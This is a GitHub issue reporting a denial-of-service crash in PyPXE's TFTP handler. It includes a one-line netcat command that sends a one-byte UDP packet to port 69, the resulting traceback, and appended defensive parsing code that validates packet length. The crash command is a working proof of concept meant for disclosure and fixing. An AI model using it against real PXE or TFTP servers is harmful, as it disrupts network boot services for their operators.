pypxe / PyPXE

Pure Python PXE (DHCP-(Proxy)/TFTP/HTTP/NBD) Server
MIT License

DoS when parsing a packet of insufficient length #206

Open grandnew opened 1 year ago

grandnew commented 1 year ago

A denial-of-service bug exists in the handle function in the tftp module when parsing a packet of insufficient length.

Reproduce

1. Start the Server

python -m pypxe.server --tftp

2. Attack

Send a UDP packet with the following payload:

echo -n "00" | xxd -r -p | nc -u 127.0.0.1 69

Then, the server will crash and the logs are as follows:

2023-10-26 14:56:25,545 [INFO] PyPXE Starting TFTP server...
2023-10-26 14:56:25,545 [INFO] PyPXE PyPXE successfully initialized and running!
Exception in thread Thread-1:
Traceback (most recent call last):
  File "/usr/lib/python2.7/threading.py", line 801, in __bootstrap_inner
    self.run()
  File "/usr/lib/python2.7/threading.py", line 754, in run
    self.__target(*self.__args, **self.__kwargs)
  File "pypxe/tftp.py", line 289, in listen
    self.ongoing.append(Client(sock, self))
  File "pypxe/tftp.py", line 39, in __init__
    self.handle() # message from the main socket
  File "pypxe/tftp.py", line 201, in handle
    [opcode] = struct.unpack('!H', self.message[:2])
error: unpack requires a string argument of length 2
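
One way to guard against the crash reported above is to length-check every fixed-width field before calling struct.unpack and to turn malformed input into a TFTP ERROR reply instead of an uncaught exception. This is an added example, not PyPXE's code or a patch from the project; the names parse_request, handle_datagram, error_packet and MalformedPacket are hypothetical, and the sample datagrams in the comments are constructed.

```python
import struct

# TFTP opcodes as defined in RFC 1350
RRQ, WRQ, DATA, ACK, ERROR = 1, 2, 3, 4, 5

class MalformedPacket(ValueError):
    """Raised for bad input so struct.error never reaches the listener thread."""

def parse_request(message):
    """Validate an untrusted datagram and return (opcode, fields)."""
    if len(message) < 2:
        # The 1-byte datagram from the report stops here instead of in unpack().
        raise MalformedPacket("short packet: %d byte(s)" % len(message))
    (opcode,) = struct.unpack("!H", message[:2])
    body = message[2:]
    if opcode in (RRQ, WRQ):
        # filename and mode are NUL-terminated; both terminators must be present,
        # so a well-formed body splits into at least three parts.
        parts = body.split(b"\x00")
        if len(parts) < 3 or not parts[0] or not parts[1]:
            raise MalformedPacket("request missing filename or mode")
        return opcode, {"filename": parts[0], "mode": parts[1].lower()}
    if opcode in (DATA, ACK, ERROR):
        # All three carry a 16-bit block number or error code after the opcode.
        if len(body) < 2:
            raise MalformedPacket("missing 16-bit field after opcode")
        (number,) = struct.unpack("!H", body[:2])
        return opcode, {"number": number, "rest": body[2:]}
    raise MalformedPacket("unknown opcode %d" % opcode)

def error_packet(code, text):
    """Build a TFTP ERROR packet: opcode 5, error code, NUL-terminated message."""
    return struct.pack("!HH", ERROR, code) + text.encode("ascii") + b"\x00"

def handle_datagram(message):
    """Return (parsed, None) for valid input or (None, reply_bytes) for bad input."""
    try:
        return parse_request(message), None
    except MalformedPacket as exc:
        return None, error_packet(4, str(exc))  # 4 = illegal TFTP operation

if __name__ == "__main__":
    # Constructed samples: the 1-byte packet from the report, then a valid RRQ.
    print(handle_datagram(b"\x00"))
    print(handle_datagram(b"\x00\x01boot.img\x00octet\x00"))
```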